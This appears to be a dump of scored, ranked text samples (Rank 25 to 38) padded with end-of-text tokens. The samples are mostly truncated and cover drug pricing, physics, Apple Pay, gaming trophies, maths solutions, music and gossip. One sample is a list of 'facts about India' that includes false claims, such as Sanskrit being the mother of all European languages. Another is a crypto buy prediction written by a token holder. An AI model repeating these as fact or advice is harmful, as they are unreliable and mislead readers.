surely.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 25; Score = 606208.0 +<|begin_of_text|>Close + +At $84,000 ($1,000 per pill), Gilead Sciences Inc.'s new hepatitis C drug is a pricey cure. It's also highly effective, producing 90% cure rates in trials and a reduction in side effects and other complications. Some argue it's the most important drug approved this year, offering hope to many afflicted with the viral disease. + +But the price of the drug, Sovaldi, is a threat to the efforts attempting to ease up on medical costs and relieve taxpayers. Senators Ron Wyden (D-Oregon) and Chuck Grassley (R-Iowa) sent a letter to Gilead requesting an explanation for the drug's high cost. + +"It is unclear how Gilead set the price for Sovaldi," the senators wrote in the letter, which was sent to the biopharmaceutical company on Friday, June 11. "That price appears to be higher than expected given the costs of development and production and the steep discounts offered in other countries." + +Pharmasset originally developed the hepatitis C drug and intended to price the therapy at $36,000. In 2011, Gilead Sciences acquired Pharmasset for $11 billion. Before the buy, Phramasset was working on the drug with Bristol-Myers Squibb, a company that was developing a combination drug that some said worked better. Possibly in an attempt to launch the drug faster, Gilead dropped Bristol-Myers Squibb after it acquired Pharmasset. + +Sovaldi could become one of the top-selling pharmaceutical therapies, as sales are projected to hit $8 billion this year. The senators argue that this will also increase Medicare and Medicaid costs. + +Previously in March, House Democrats had also sent a letter to Gilead asking for an explanation of their intended price tag. + +"This letter is a 'bank shot' that gets things going, with the goal of getting Gilead to significantly lower the price of Sovaldi," said Terry Haines, a political strategist. It was intended not only to put pressure on the company, but also to motivate other lawmakers to band together in the effort. + +"Our concern is that a treatment will not cure patients if they cannot afford it," the letter said. + +Hepatitis C, a contagious liver disease, can be fatal when left untreated. Approximately 3 million people suffer from the illness, and that number is expected to steadily rise. It spreads through contact with an infected person's blood. While the infection can be short-term, the chances of short-term +================================================================================ +Rank = 26; Score = 593920.0 +<|begin_of_text|>Here are some amazing facts that will make you more proud to be an Indian. Read on... + +India invented the Number System. Zero was invented by Aryabhatta. India never invaded any country in her last 10000 years of history. Sanskrit is the mother of all the European languages. Sanskrit is the most suitable language for computer software, according to a report in Forbes magazine, July 1987. The World's first university was established in Takshila in 700BC. More than 10,500 students from all over the world studied more than 60 subjects there. The University of Nalanda built in the 4th century BC was one of the greatest achievements of ancient India in the field of education. Ayurveda is the earliest school of medicine known to humans. Charaka, the father of medicine consolidated Ayurveda 2500 years ago. Today Ayurveda is fast regaining its rightful place in our civilization.India was the richest country on earth until the British invaded in the early 17th Century. Christopher Columbus was attracted by India's wealth. Bhaskaracharya calculated the time taken by the earth to orbit the sun hundreds of years before the astronomer Smart. Time taken by earth to orbit the sun in the 5th century - 365.258756484 days. The art of navigation was born in the river Sindh 6000 years ago. The very word Navigation is derived from the Sanskrit word NAVGATIH. The word navy is also derived from Sanskrit 'Nou'. The value of "pi" was first calculated by Budhayana, and he explained the concept of what is known as the Pythagorean Theorem. He discovered this in the 6th century long before the European mathematicians. According to the Gemological Institute of America, up until 1896, India was the only source for diamonds to the world. Algebra, trigonometry and calculus came from India. Quadratic equations were by Sridharacharya in the 11th century. The largest numbers the Greeks and the Romans used were 106 whereas Hindus used numbers as big as 10**53(10 to the power of 53) with specific names as early as 5000 BCE during the Vedic period. Even today, the largest used number is Tera 10**12(10 to the power of 12). Usage of anesthesia was well known in ancient India medicine. Detailed knowledge of anatomy, embryology, digestion, metabolism, +================================================================================ +Rank = 27; Score = 593920.0 +<|begin_of_text|>How many atoms are there in a kilogram of silicon? This number is Avogadro’s constant and working out its value is one of the more important tasks that materials scientists face. + +Today, a group of physicists reveal the answer. They say there are 6.02214084(18) × 10^23 atoms in a single crystal of silicon weighing about a kilogram. And they say they know this is right because they’ve counted them. Yep, counted them. + +Actually, they counted the number of atoms in a unit volume of silicon and measured the size of this volume. The number of times this fits into a lump of exactly 1 mole of near perfect single crystal sphere of silicon is Avogadro’s number. + +To have established this number to such accuracy is clearly an important piece of work but just how impressive is put in perspective by the monumental efforts of the international consortium behind it. + +The work began in 2004 when a Russian group created a sample of silicon flouride with a specific isotopic content at the Central Design Bureau of Machine Building in St. Petersburg. A team at the Institute of Chemistry of High-Purity Substances of the Russian Academy of Sciences in Nizhny-Novgorod then turned this into a polycrystal of silicon hydride which a group at the Leibniz-Institut fur Kristallzuchtung in Berlin used to grow a 5kg lump of pure monocrystalline silicon in 2007. + +The Australian Centre for Precision Optics then took samples from this lump and shaped them into quasi-perfect spheres. They then made an x-ray interferometer from the left over silicon to determine its crystal structure. They also measured crystals’ surfaces to see what kind of crud had built up there and would therefore have to be taken into account in the final calculations. (Various copper, nickel and silicon oxides had built up on the surface.) + +Various groups then measured the mass of the spheres by comparing them to the platinum-iridium test kilograms owned by the PTB (Physikalisch-Technische Bundesanstalt) in Germany, the National Metrology Institute of Japan in Tskuba and the Bureau International des Poids et Mesures in France. + +The team then measured the volume of the spheres using optical interferometry. And the isotope content was measured by teams at the University of Warsaw, the Institute of Mineral Resources of the Chinese Academy of Science and Institute for Physics of Microstructures of the Russian Academy of Sciences. + +Finally, the number of +================================================================================ +Rank = 28; Score = 577536.0 +<|begin_of_text|>Share + +Put all that upbeat news about Apple Pay usage on hold for a moment. A new report says that 85 percent of iPhone 6 and iPhone 6 Plus owners still haven’t used Apple’s mobile payments service. + +As of this month, 6 percent of iPhone 6 and iPhone 6 Plus owners use Apple Pay, up from 5 percent in November 2014, according to “Apple Pay By The Numbers: Adoption And Behavior,” a report presented at Innovation Project 2015 by payments-focused company PYMNTS.com and shopper insights company InfoScout. Meanwhile, 9 percent of iPhone 6 and iPhone 6 Plus owners have tried Apple Pay but aren’t currently using it, up from 4 percent in November. + +This means 85 percent of iPhone 6 and iPhone 6 Plus owners have never touched Apple Pay. This is down from 91 percent in November, but it still spotlights an uphill battle for adoption. + +“The main reason those who had tried Apple Pay in the past, but didn’t on some transactions where it was available, seems to be forgetfulness – almost a third (32 percent) said they just forgot it was an option,” according to PYMNTS.com. + +Apple should be “dead-focused” on point-of-sale and make sure there’s a trigger to compel users to use their phone instead of their card to pay, according to Jared Schrieber, co-founder and CEO of InfoScout. + +“Apple Pay is not yet salient. When it comes up, it has not registered with the [consumer] that they should use Apple Pay,” Schrieber said. “There’s something lacking there in the habit-forming action at checkout.” + +The report also notes that 31 percent of surveyed users didn’t know whether the Apple Pay-friendly merchant they were shopping at accepted the mobile payments option. Meanwhile, 20 percent of respondents said they prefer a different payment method. + +The 6 percent of iPhone 6 and iPhone 6 Plus owners who regularly use Apple Pay have positive impressions of the service, as 79 percent said it was more convenient, 77 percent said it was faster, 73 percent said it was easier to use and 70 percent said it was more secure. + +Despite the hype and eagerness of some users to make six-month-old Apple Pay a mainstream success, the current approach “doesn’t look promising,” according to David Evans, founder of management consulting firm Market Platform Dynamics. + +“Apple will need to either figure out a way to broaden the base of +================================================================================ +Rank = 29; Score = 573440.0 +<|begin_of_text|>Push it to the Limit! + +Obtain all trophies 0.8% + +Ultra Rare 4.38% + +Ultra Rare + +VS Master + +Defeat all VS characters 0.9% + +Ultra Rare 4.54% + +Ultra Rare + +Secret Master + +Defeat all secret VS characters 0.9% + +Ultra Rare 4.57% + +Ultra Rare + +The End...? + +Watch the ending movie 17.7% + +Rare 22.45% + +Uncommon + +Absolute Finesse + +Score a condor in a recorded official round 1.3% + +Ultra Rare 5.54% + +Very Rare + +Walking Encyclopedia + +Complete the fish encyclopedia 1.8% + +Ultra Rare 6.84% + +Very Rare + +Rank 5 Cleared! + +Clear rank 5 of the challenge tournaments 22.3% + +Rare 27.69% + +Uncommon + +Rank 4 Cleared! + +Clear rank 4 of the challenge tournaments 28.1% + +Rare 34.55% + +Uncommon + +Rank 3 Cleared! + +Clear rank 3 of the challenge tournaments 38.5% + +Rare 47.28% + +Uncommon + +It's a Miracle! + +Score an albatross in a recorded official round 6.1% + +Very Rare 11.22% + +Rare + +My First Hole-in-One! + +Score a hole-in-one in a recorded official round 12.8% + +Very Rare 17.83% + +Rare + +Inspiring Spiral + +Sink the ball with a Spiral Shot in a recorded official round 3.1% + +Ultra Rare 9.77% + +Very Rare + +Bolt from the Blue + +Sink the ball with a Rising Shot in a recorded official round 10.1% + +Very Rare 18.27% + +Rare + +Never Misses the Mark + +Sink the ball with a Homing Shot in a recorded official round 13.3% + +Very Rare 21.48% + +Uncommon + +Full House + +Get all computer-controlled NPCs from challenge + +tournament matches to join the gallery 3.1% + +Ultra Rare 7.24% + +Very Rare + +Top Marks + +Get all the answers right in the Professor's three quizzes 13.0% + +Very Rare 21.23% + +Uncommon + +Rank 2 Cleared! + +Clear rank 2 of the challenge tournaments 49.3% + +Rare 60.84% + +Common + +Rank 1 Cleared! + +Clear rank 1 of the challenge tournaments 64.1% + +Common 76.17% + +Common + +Hop, Skip, and a Jump + +Successfully perform a +================================================================================ +Rank = 30; Score = 569344.0 +<|begin_of_text|>When there are nine + +Sara Haider Blocked Unblock Follow Following Feb 2, 2016 + +You can’t be what you can’t see, and I see a lack of women leaders in my industry. + +Despite good intentions from most people, unconscious bias and structural inequality still leads us to a world where women and minorities are extremely underrepresented in Silicon Valley. We can do better. + +After being in this industry for almost a decade, I’ve learned that given the existing inequalities, the only way to make real change is to go out of your way to do so. It’s important to acknowledge that there is already bias in your criteria, whether for hiring, promoting, or investing. So you must go out of your way to champion women and underrepresented minorities. + +I don’t tweet about it a lot, but I’m an active angel investor. In the last three years, I’ve made nine investments, and three of them were in companies with women CEOs. 33% doesn’t feel good enough, though sadly this is likely higher than the ratio for most venture firms and angels. So I’ve decided to take it one step further. + +I’m committing that the next nine angel investments I make will only be in companies run by women CEOs, without exception. + +Recently, I’ve become a Sequoia Scout, so some of my investments will involve Sequoia’s capital. But my promise to only invest in women stands whether or not the funds are from my personal capital or Sequoia’s. + +I think Supreme Court Justice Ruth Ginsburg sums it up quite nicely:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 31; Score = 561152.0 +<|begin_of_text|>Share + +Apple is known for its crazy patents, but some of them are much more realistic. On Tuesday, the U.S. Patent and Trademark Office granted the company a patent for a special construction process that involves LiquidMetal and sapphire glass displays. The patent approval occurred right after Apple announced that it has exclusive rights to LiquidMetal’s unique alloy until 2015. + +In scientific terms, LiquidMetal is a bulk amorphous alloy and is considered an exotic metal. It may look like a metal in liquid form, but it moves like molten plastic. So far, LiquidMetal has only been used to make a SIM card ejector, some military equipment, and medical devices. The technology has been put to the test, but it has never been used to create a consumer smartphone or tablet. Nonetheless, it seems that Apple may have plans to forge its future iPhones and iPads using the LiquidMetal technology. + +Apple’s patent describes the new use it has in mind for LiquidMetal and how it will aid in stabilizing the sapphire glass displays in future iDevices. Stabilization is necessary, so that when you inevitably drop your iPhone, the glass doesn’t shatter or simply pop off. Back in 2007, Apple used a plastic chassis and a rubberized gasket to protect the display from sudden impacts. This technology is still used in all other iPhone models up to the iPhone 5S. + +The new patent aims to avoid all these annoying in-between steps and go directly from the metal chassis to the display, using LiquidMetal in a new metal injection molding process. That way, Apple can form sapphire glass directly into the iPhone or iPad’s metal bezel. The patent indicates that plastic can also be used, but the emphasis is on the idea of using LiquidMetal to ensure the strongest bond and protection between the glass display and metal chassis. + +Clearly, this technology is very cutting edge, but its application is untested in mobile devices, so don’t get too pumped up, thinking LiquidMetal will debut with the iPhone 6 this September (or August, depending on which rumors you believe. Read our roundup here). However, given Apple’s agreement with GT Technologies to manufacture enormous amounts of sapphire glass, it’s probably safe to assume that a sapphire glass display is forthcoming on the long-awaited iPhone 6.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 557056.0 +<|begin_of_text|>Share + +As long as you haven’t been living under a rock for the past several months, then you have probably heard at least something about the sudden rise in value of cryptocurrencies like Bitcoin and Ethereum. These are the two most popular cryptocurrencies, both of which have seen gains of over 300% in just about 3 month’s time. + +While Bitcoin and Ethereum are the two most popular cryptocurrencies available, there are literally dozens upon dozens of others as well, and these cryptos trade on an open market daily. One such example is the Swarm City Cryptocurrency (SWT). In reality Swarm City is a “token” based on the aforementioned Ethereum cryptocurrency, and by viewing the technical analysis of recent trades, I am led to believe that now is a tremendous time to buy in. You see, technical analysis views trends, resistance, moving averages, etc. of an investment vehicle. This analysis is considered daily when trading stocks and foreign exchange currency, and now is being increasingly used in the trading of various cryptocurrencies and tokens. + +Today, Swarm City (SWT) appears to have met resistance (see photo to the right). It’s a level that the trading value of the cryptocurrency broke toward the end of last month and then shot up nearly 200% before falling back down just recently. Currently Swarm City is again at this level, this time from above, so I expect to see it bounce off this level and shoot up once again. + +If you then take a look at the daily chart (below), you will see that there is another level of resistance where Swarm City has bounced off of in the past. I expect the last red candle on this chart to drop back and for it to be followed by multiple green candles, representing a surge forward in the crypto. + +It’s possible that it will ultimately break this resistance level, and fall to the next level of resistance at 0.00075, but my guess is that we will see the bounce now at around 0.11600. If this bounce occurs, I expect to see Swarm City shoot up at least to the 0.002 level but perhaps past the 0.0025 level. + +(note: This article is my opinion only, and I am a trader of Swarm City. Currently I own the cryptocurrency.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 33; Score = 548864.0 +<|begin_of_text|>Problem 1.1: Above, we saw that \(n^2\), a quadratic, had a linear sequence as its finite differences. Prove this for the general quadratic. + +If the sequence is \(A n^2 + B n + C\), the finite differences are of the form \(A[(n+1)^2 - n^2] + B[(n+1) - n] + C[1 - 1] = (2A)n + (A + B)\), which is linear + +Problem 1.2: What would be the corresponding theorem for cubics? Prove it. + +We know that the cubic is of the form \(A n^3 + q(n)\), where \(q(n)\) is quadratic. Our finite differences are \(A [(n+1)^3 - n^{3}] + [q(n+1) - q(n)]\). The finite differences of the second term are linear and of the first are quadratic, so the overall differences are quadratic. + +Problem 1.3: Extend the above to general $n$-th order polynomials. + +Induct. When you expand \((n+1)^k - n^k\), we get a polynomial of degree \(k-1\); induct downward on \(k\). + +Problem 2.1: The "Tribonacci" sequence is defined by \(T_{n+3} = T_{n+2} + T_{n+1} + T_n\) and starting values \(T_1 = T_2 = T_3 = 1\). What is the smallest \(n\) for which \(T_n\) is over 9000? Over \(10^{10}\)? A calculator might be helpful, but don't just brute force the answer. + +I warn you, this problem is somewhat hard. Let's begin. We first find the characteristic polynomial, \(P(\lambda) = \lambda^3 - \lambda^2 - \lambda - 1\). Now we need to find roots, but this polynomial does not factor in any nice way. What you can do, however, is estimate. \(P(1) = 1 - 1 - 1 - 1 = -2\), and \(P(2) = 8 - 4 - 2 - 1 = 1\), so we know that our answer is close to 2. We can check \(1.8\) or so, and we +================================================================================ +Rank = 34; Score = 544768.0 +<|begin_of_text|>Share + +tweet + +Are Germaine Greer and Richard Dawkins being transphobic? Johanna argues that their perspective is wrong because they both dehumanify gender and empty it of its subjectivity. + +Beyond calling transphobia “transphobia”, we have very few ways of describing what is specifically wrong with bigotism directed towards transgender people (or people perceived to be transgender). It’s a truism that trans-conversations take about six times as long as a normal conversation because we have to use and often explain so much jargon that is unfamiliar to most people and even may transpeople themselves. We need better, more concise and descriptively intuitive terms to describe the kinds of abuse we face to help educate others why they are wrong. + +For instance calling Greer’s words an assault would be disingenuous. They’re a presumably an honest opinion, and not really directed at any specific individuals, but rather are a discriminatory attitude and mode of thinking that she broadcast to the world. + +So what was she doing? Why was what she said so vile and objectionable? + +Simply put, she was attempting to take gender away from transpeople. We are labelled as (trans-)eunuchs by “de-gendering” us. Gender is a fundamental human characteristic. Everyone has one, and though most people have conventional binary genders, they are still within the spectrum of possible genders. No one tries to take cisgendered people’s gender away without an outcry! + +Hence, “degendering”. Adjective: to literally or figuratively attempt to remove a person’s self-determined gender and/or the act of physically removing gender characteristics from a person. + +So this is what Greer did wrong: “she degendered us”, and compare that idea to things like being “emasculated” or the kind of misogyny that insidiously devalues women. Because it really is the same thing just with a different target. + +We can also describe potential social-consequences of ‘degendering’ by comparing it to ‘outing’ someone, or stigmatising a skin colour, a religion or even being cis-gendered. “Degendering”, we argue, is what Richard Dawkins demonstrated with his tweet dated 5:34 am, 26th October, 2015. + +“Is a trans-woman a woman? Purely semantic. If you define by chromosomes, no. If by self-identification, yes. I call her ‘she’ out of courtesy.” + +This is not transphobia +================================================================================ +Rank = 35; Score = 544768.0 +<|begin_of_text|>Share + +Fresh grime styles. + +On the cover for his new album, Safe, Louis Carnell looks like he's just awoken from a cryogenic freeze. It's an appropriate image. His tracks as Visionist sound as if they were made in an icy cave. Carnell uses wordless vocal samples and glassy synths to create an ethereal, almost choral take on grime. The South Londoner has been honing his style for the last few years, releasing on respected, boundary-pushing labels like Lit City Trax, Diskotopia, Leisure System and Left Blank. He's been a key name in the recent wave of creativity that's swept instrumental grime, but instead of focusing on rhythmic innovation or experimental sonics like many of his peers, Carnell's channelled emotions. On the two-part I'm Fine series he explored the five stages of grief: denial, anger, bargaining, depression and acceptance. "The sharply honed dance music motifs that swim in the vast space seem untethered from any club context, instead pointing in on themselves," said Maya Kalev in her review of Part II. Similarly, Safe, which is released this week through PAN, sees Carnell confronting his struggles with anxiety. "I needed to make it a challenging listen to reflect this," he says below. The album's 15 tracks push Carnell's template further than ever before—the beats are tougher, the vocals more dense, the atmospheres chillier. + +Along with his own work, Carnell is doing plenty to keep grime and its offshoots moving forward. His Lost Codes label gave early releases to trailblazers like Filter Dread, Sd Laika, Bloom and Acre, and the imprint was recently reborn as CODES, with PAN's Bill Kouligas coming on board. On RA.488 Carnell showcases plenty of artists in this ilk alongside cuts from Safe, resulting in a 42-minute, 27-track sonic blast. + +What have you been up to recently? + +Since the album finished, I have been working hard on my upcoming live shows. The first one is premiering at Unsound festival next week. Also keeping it busy with a lot of upcoming releases and new artists we're working with for our new label CODES, which I co-run with Bill from PAN. + +How and where was the mix recorded? + +It was recorded live straight in Logic, on CDJs and Serato in my flatmate's room. + +Can you tell us about the idea behind the mix? + + +================================================================================ +Rank = 36; Score = 532480.0 +<|begin_of_text|>Share + +‘Awkward’ is a great word to describe the public relationship between President Donald Trump and his beautiful wife Melania. Over the last 8 months or so, the American people have been given a front row seat into a relationship which seems to be filled with strife. After all, what marriage wouldn’t have its issues when one of the two people involved were caught on camera saying they like to grab women by the ‘pussy’, right? + +We have seen Melania make faces of disgust behind her husband’s back, refuse to hold his hand on numerous occasions, and only show affection when it seems like she almost has to. With all that said, yesterday’s antics at military facility Joint Base Andrews, may take the cake for the most awkward moment yet, since Trump’s presidency began nearly eight months ago. + +Melania Trump was on hand to introduce her husband to the service men and women at the base in Maryland. + +“It’s my great pleasure to introduce my husband, the President of the United States, Donald Trump,” stated Melania. + +As she concluded her remarks, the President slowly stepped towards her, shook her hand and then appeared to almost push or guide her off stage. Such actions would appear to be normal, had the person introducing him been another male politician or statesman, however it almost appeared as if President Trump had forgotten that this was his wife he was dealing with. A kiss, or a long hug certainly would not have been out of the ordinary in this situation. + +The US First Lady introduces her husband on stage at an event at Joint Base Andrews. He thanks her with a handshake. pic.twitter.com/fPQNoMpnWa — Caitriona Perry (@CaitrionaPerry) September 15, 2017 + +While rumors have surfaced that Melania had prepared to divorce the President prior to him unexpectedly winning the 2016 election, the event witnessed yesterday appears to show that there is a clear lack of affection within this marriage. Let’s hear your thoughts on yet another awkward moment between these two, in the comments section below.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 37; Score = 524288.0 +<|begin_of_text|>The Planck acceleration is the acceleration from zero speed to the speed of light during one Planck time. It is a derived unit in the Planck system of natural units. + +Formula and value [ edit ] + +Planck acceleration may be stated as + +a P = c t P = 299792458 m / s 5.39116 × 10 − 44 s {\displaystyle a_{\text{P}}={\frac {c}{t_{\text{P}}}}={\frac {299792458\ m/s}{5.39116\times 10^{-44}\ s}}} + +≈ 5.560815 × 10 51 m / s 2 {\displaystyle \approx 5.560815\times 10^{51}\ m/s^{2}} + +≈ 5.670453 × 10 50 g {\displaystyle \approx 5.670453\times 10^{50}\ g} + +where a P is the Planck acceleration, c is the speed of light, t P is the Planck time[1] and g is the standard acceleration of gravity.[2] + +Meaning [ edit ] + +The Planck acceleration is the highest acceleration conceivable in the Universe, as the speed of light is the highest possible speed and the Planck time is the shortest possible duration of any meaningful physical process. This limitation does assume that relativity has natural units. However, it is not clear whether any object in the Universe actually reaches or can reach the Planck acceleration. One event where the Planck acceleration was possibly reached was the Big Bang, in regard to the acceleration of the expanding Universe during the Planck epoch. Also, within a black hole, such acceleration might be possible beyond its horizon, but that is certainly unknown (and what lies beyond a horizon is beyond the reach of physical observation). + +In a classical description, photons emanating from their subluminal source (for example, a particle-antiparticle collision) experience zero acceleration, as they always travel at the speed of light. However, since the Planck time is the least conceivable delay, the "instantaneous" production of a photon pair can not be distinguished from the acceleration of a photon from zero to the speed of light in a Planck time, thereby achieving a Planck acceleration. In other words, nothing higher than the Planck acceleration can be measured, since that would imply measuring a time interval shorter than the Planck time. + +As with other quantities at the Planck scale, the physics of +================================================================================ +Rank = 38; Score = 524288.0 +<|begin_of_text|>Phoenix Coyotes Playoff Chances 2013-2014 Beat Dallas 2-1, lottery seed down 0.4 to 18 89 points 37 30-15 Add your own league How are these numbers calculated? Lottery We are out of the playoffs. Here are the big games and what ifs for draft seeds. + +Although it might be more fun to go down swinging. Big Games Friday 100.0* Lottery seed Washington 4 Chicago 0 +0.2 Dallas 3 St. Louis 0 +0.2 New Jersey 2 NY Islanders 3 (so) -0.1 Saturday 100.0* Lottery seed Phoenix 2 San Jose 3 +0.5 Nashville 7 Chicago 5 +0.1 Sunday 100.0* Lottery seed Phoenix 2 Dallas 1 -1.4 New Jersey 3 Boston 2 +0.3 Minnesota 3 Nashville 7 +0.3 Pittsburgh 2 Ottawa 3 (so) +0.2 Washington 0 Tampa Bay 1 (so) +0.2 Points Chance Will Make 